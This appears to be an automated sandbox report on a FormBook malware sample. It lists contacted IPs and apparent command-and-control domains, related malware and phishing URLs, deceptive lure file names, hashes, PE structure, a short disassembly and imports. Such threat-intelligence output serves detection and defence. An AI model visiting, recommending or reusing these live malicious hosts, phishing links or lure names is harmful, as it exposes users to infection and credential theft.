101.32.205.61 | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | www.rwse6wjx.sbs/n0se/
103.159.36.66 | ofZiNLLKZU.exe | malicious | FormBook | www.rokeyfashion.store/nfd2/
104.21.28.65 | ofZiNLLKZU.exe | malicious | FormBook | www.binjai77rtp11f.xyz/9fei/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.3nhc3a.top | ofZiNLLKZU.exe | malicious | FormBook | 20.2.208.137
www.showyourstyle.top | ofZiNLLKZU.exe | malicious | FormBook | 69.57.163.64
www.binjai77rtp11f.xyz | ofZiNLLKZU.exe | malicious | FormBook | 104.21.28.65
www.vietnamtour.pro | ofZiNLLKZU.exe | malicious | FormBook | 172.67.138.138
b1-3-r111.kunlundns.top | YKzxWyqI6Y.exe | malicious | FormBook | 101.32.205.61
b1-3-r111.kunlundns.top | ofZiNLLKZU.exe | malicious | FormBook | 101.32.205.61
b1-3-r111.kunlundns.top | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | 101.32.205.61
b1-3-r111.kunlundns.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 43.155.76.124
b1-3-r111.kunlundns.top | SWIFT COPY 0028_pdf.exe | malicious | FormBook | 43.155.76.124
b1-3-r111.kunlundns.top | PO-DC13112024_pdf.vbs | malicious | Unknown | 43.155.76.124
b1-3-r111.kunlundns.top | 3NvALxFlHV.exe | malicious | FormBook | 43.155.76.124
b1-3-r111.kunlundns.top | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | FormBook | 43.155.76.124
b1-3-r111.kunlundns.top | QUOTE2342534.exe | malicious | FormBook | 129.226.56.200
b1-3-r111.kunlundns.top | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exe | malicious | FormBook | 129.226.56.200
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                TWIDC-AS-APTWIDCLimitedHKofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • 103.159.36.66
                                                                31.13.224.14-x86-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                • 154.211.10.50
                                                                armv5l.elfGet hashmaliciousMiraiBrowse
                                                                • 103.155.98.87
                                                                loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                • 103.153.231.129
                                                                la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                • 103.156.125.183
                                                                la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                • 103.157.51.43
                                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 103.155.172.227
                                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 103.155.82.213
                                                                loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                • 103.153.202.21
                                                                loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                • 103.159.118.126
                                                                MICROSOFT-CORP-MSN-AS-BLOCKUS3.elfGet hashmaliciousUnknownBrowse
                                                                • 20.59.210.205
                                                                https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                • 13.107.246.45
                                                                6.elfGet hashmaliciousUnknownBrowse
                                                                • 20.206.82.79
                                                                6.elfGet hashmaliciousUnknownBrowse
                                                                • 40.76.46.130
                                                                phish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousUnknownBrowse
                                                                • 52.102.11.124
                                                                https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                                                • 20.82.124.160
                                                                5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                • 20.2.36.112
                                                                https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                • 20.190.160.20
                                                                http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                • 40.126.32.68
                                                                Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                                                • 40.126.32.72
                                                                TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNYKzxWyqI6Y.exeGet hashmaliciousFormBookBrowse
                                                                • 101.32.205.61
                                                                02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 101.35.209.183
                                                                suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                • 101.35.209.183
                                                                https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                                                • 170.106.97.195
                                                                 https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f | malicious | HTMLPhisher
                                                                 • 170.106.97.196
                                                                 ofZiNLLKZU.exe | malicious | FormBook
                                                                 • 101.32.205.61
                                                                 https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu | malicious | Unknown
                                                                 • 170.106.97.195
                                                                 ReIayMSG__polarisrx.com_#7107380109.htm | malicious | HTMLPhisher
                                                                 • 119.28.146.206
                                                                 ReIayMSG__polarisrx.com_#6577807268.htm | malicious | HTMLPhisher
                                                                 • 119.28.147.117
                                                                 VM_MSG-Gf.htm | malicious | HTMLPhisher
                                                                 • 119.28.147.117
                                                                 FORTRESSITXUS25IvlOVEB1.exe | malicious | FormBook
                                                                 • 69.57.163.64
                                                                 AuKUol8SPU.exe | malicious | FormBook
                                                                 • 69.57.163.64
                                                                 ofZiNLLKZU.exe | malicious | FormBook
                                                                 • 69.57.163.64
                                                                 3HnH4uJtE7.exe | malicious | FormBook
                                                                 • 69.57.163.64
                                                                 Benefit_401k_2025_Enrollment.pdf | malicious | Unknown
                                                                 • 69.57.162.6
                                                                 miori.spc.elf | malicious | Unknown
                                                                 • 69.72.254.176
                                                                 sh4.nn.elf | malicious | Mirai, Okiru
                                                                 • 208.116.70.219
                                                                 DHL.exe | malicious | FormBook
                                                                 • 69.57.163.64
                                                                 la.bot.mipsel.elf | malicious | Mirai
                                                                 • 65.98.32.221
                                                                 Salmebogs(1).exe | malicious | FormBook, GuLoader
                                                                 • 69.57.163.64
                                                                No context
                                                                No context
                                                                Process:C:\Windows\SysWOW64\TCPSVCS.EXE
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                Category:modified
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.1215420383712111
                                                                Encrypted:false
                                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\xaqnaB0rcW.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):287744
                                                                Entropy (8bit):7.992827042528865
                                                                Encrypted:true
                                                                SSDEEP:6144:zoa+xlR9ayzf/4azq/zfCvPRslvulhZUfheT0wBRB:szxlvaaf/jqDMMulh4hYVJ
                                                                MD5:974F9C3D17E6C19AA3614BE4C06232E3
                                                                SHA1:62A6C991ECF060E024C2A5B5AE8358508C2279A3
                                                                SHA-256:F3A828E0CED7034FDF4B4030E01246B399F8CB436C90EEF106F0D1C94DD63D44
                                                                SHA-512:A2BF05A5FD5300CA6A9EFB238691F30E5B4F27BC855274D168C2FEF787DE9E2AF33B0864FA37BF8008A26B75C9CDFE93D1EB8044FF08DC68DE6F9AF124EEA7FE
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...6WRB704H3.0K.CRR6TRBw44H34P0KACRR6TRB744H34P0KACRR6TRB74.H34^/.OC.[.u.C{...[]#.;3,5 W9r!VZZ'G.2Uk36<r_:r.xg.%\P5.FLIvR6TRB74MI:.mP,.~25.i2%......0W.[....45.-....T7..( :oV3.B744H34P`.AC.S7T..pb4H34P0KA.RP7_SI74fL34P0KACRR.@RB7$4H3DT0KA.RR&TRB544N34P0KACTR6TRB744874P2KACRR6VR..44X34@0KACBR6DRB744H#4P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB.@Q0G4P0..GRR&TRBe04H#4P0KACRR6TRB74.H3TP0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P
                                                                Process:C:\Users\user\Desktop\xaqnaB0rcW.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):287744
                                                                Entropy (8bit):7.992827042528865
                                                                Encrypted:true
                                                                SSDEEP:6144:zoa+xlR9ayzf/4azq/zfCvPRslvulhZUfheT0wBRB:szxlvaaf/jqDMMulh4hYVJ
                                                                MD5:974F9C3D17E6C19AA3614BE4C06232E3
                                                                SHA1:62A6C991ECF060E024C2A5B5AE8358508C2279A3
                                                                SHA-256:F3A828E0CED7034FDF4B4030E01246B399F8CB436C90EEF106F0D1C94DD63D44
                                                                SHA-512:A2BF05A5FD5300CA6A9EFB238691F30E5B4F27BC855274D168C2FEF787DE9E2AF33B0864FA37BF8008A26B75C9CDFE93D1EB8044FF08DC68DE6F9AF124EEA7FE
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...6WRB704H3.0K.CRR6TRBw44H34P0KACRR6TRB744H34P0KACRR6TRB74.H34^/.OC.[.u.C{...[]#.;3,5 W9r!VZZ'G.2Uk36<r_:r.xg.%\P5.FLIvR6TRB74MI:.mP,.~25.i2%......0W.[....45.-....T7..( :oV3.B744H34P`.AC.S7T..pb4H34P0KA.RP7_SI74fL34P0KACRR.@RB7$4H3DT0KA.RR&TRB544N34P0KACTR6TRB744874P2KACRR6VR..44X34@0KACBR6DRB744H#4P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB.@Q0G4P0..GRR&TRBe04H#4P0KACRR6TRB74.H3TP0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.156536509425237
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:xaqnaB0rcW.exe
                                                                File size:1'223'680 bytes
                                                                MD5:dd5acffde51ef27c585911dea96c4336
                                                                SHA1:62a6b77a79d556fe171fdafea079fc88e400c42e
                                                                SHA256:dc710b8bed55e4cf0b6454836e15714ede75a8fa952d2756cb9b437425a6f6e9
                                                                SHA512:f3ae79e9a99e24f08c30af3a60fb116d59e9a50facaf77aa01fa8c54981763db223d2299327d20241dcbba1c2feb91491c0d15fcbdc2f38052fc6634552ae54b
                                                                SSDEEP:24576:Qtb20pkaCqT5TBWgNQ7aIaY6iFSJh6hgVu2vevI6A:ZVg5tQ7aIaYqJMh0u6eg5
                                                                TLSH:F445D01363DDC361C3B25273BA15BB01BEBB782506A5F56B2FD8083DE920162525EB73
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                Icon Hash:aaf3e3e3938382a0
                                                                Entrypoint:0x425f74
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6748FCB9 [Thu Nov 28 23:28:57 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                Instruction
                                                                call 00007F3A2CF030AFh
                                                                jmp 00007F3A2CEF60C4h
                                                                int3
                                                                int3
                                                                push edi
                                                                push esi
                                                                mov esi, dword ptr [esp+10h]
                                                                mov ecx, dword ptr [esp+14h]
                                                                mov edi, dword ptr [esp+0Ch]
                                                                mov eax, ecx
                                                                mov edx, ecx
                                                                add eax, esi
                                                                cmp edi, esi
                                                                jbe 00007F3A2CEF624Ah
                                                                cmp edi, eax
                                                                jc 00007F3A2CEF65AEh
                                                                bt dword ptr [004C0158h], 01h
                                                                jnc 00007F3A2CEF6249h
                                                                rep movsb
                                                                jmp 00007F3A2CEF655Ch
                                                                cmp ecx, 00000080h
                                                                jc 00007F3A2CEF6414h
                                                                mov eax, edi
                                                                xor eax, esi
                                                                test eax, 0000000Fh
                                                                jne 00007F3A2CEF6250h
                                                                bt dword ptr [004BA370h], 01h
                                                                jc 00007F3A2CEF6720h
                                                                bt dword ptr [004C0158h], 00000000h
                                                                jnc 00007F3A2CEF63EDh
                                                                test edi, 00000003h
                                                                jne 00007F3A2CEF63FEh
                                                                test esi, 00000003h
                                                                jne 00007F3A2CEF63DDh
                                                                bt edi, 02h
                                                                jnc 00007F3A2CEF624Fh
                                                                mov eax, dword ptr [esi]
                                                                sub ecx, 04h
                                                                lea esi, dword ptr [esi+04h]
                                                                mov dword ptr [edi], eax
                                                                lea edi, dword ptr [edi+04h]
                                                                bt edi, 03h
                                                                jnc 00007F3A2CEF6253h
                                                                movq xmm1, qword ptr [esi]
                                                                sub ecx, 08h
                                                                lea esi, dword ptr [esi+08h]
                                                                movq qword ptr [edi], xmm1
                                                                lea edi, dword ptr [edi+08h]
                                                                test esi, 00000007h
                                                                je 00007F3A2CEF62A5h
                                                                bt esi, 03h
                                                                jnc 00007F3A2CEF62F8h
                                                                movdqa xmm1, dqword ptr [esi+00h]
                                                                Programming Language:
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [ASM] VS2012 UPD4 build 61030
                                                                • [RES] VS2012 UPD4 build 61030
                                                                • [LNK] VS2012 UPD4 build 61030
                                                                 Name | Virtual Address | Virtual Size | Is in Section
                                                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
                                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x61b8c | .rsrc
                                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x126000 | 0x6c4c | .reloc
                                                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
                                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
                                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
                                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                 Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                 .text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                 .rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                 .data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                 .rsrc | 0xc4000 | 0x61b8c | 0x61c00 | f25cbd6cc2e7b75abd547f380651c405 | False | 0.9331716552109974 | data | 7.904776456505914 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                 .reloc | 0x126000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                 Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                 RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                                                 RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                                                 RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                                                 RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                                                 RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                                                 RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                                                 RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                                                 RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                                                 RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                                                 RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                                                 RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                                                 RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
                                                                 RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                                                 RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                                                                 RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                                                 RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                                                 RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                                                                 RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                                                 RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                                                 RT_RCDATA | 0xcc7b8 | 0x58e91 | data | | | 1.0003322560183647
                                                                 RT_GROUP_ICON | 0x12564c | 0x76 | data | English | Great Britain | 0.6610169491525424
                                                                 RT_GROUP_ICON | 0x1256c4 | 0x14 | data | English | Great Britain | 1.25
                                                                 RT_GROUP_ICON | 0x1256d8 | 0x14 | data | English | Great Britain | 1.15
                                                                 RT_GROUP_ICON | 0x1256ec | 0x14 | data | English | Great Britain | 1.25
                                                                 RT_VERSION | 0x125700 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                                                 RT_MANIFEST | 0x1257dc | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
                                                                DLLImport
                                                                WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                UxTheme.dllIsThemeActive
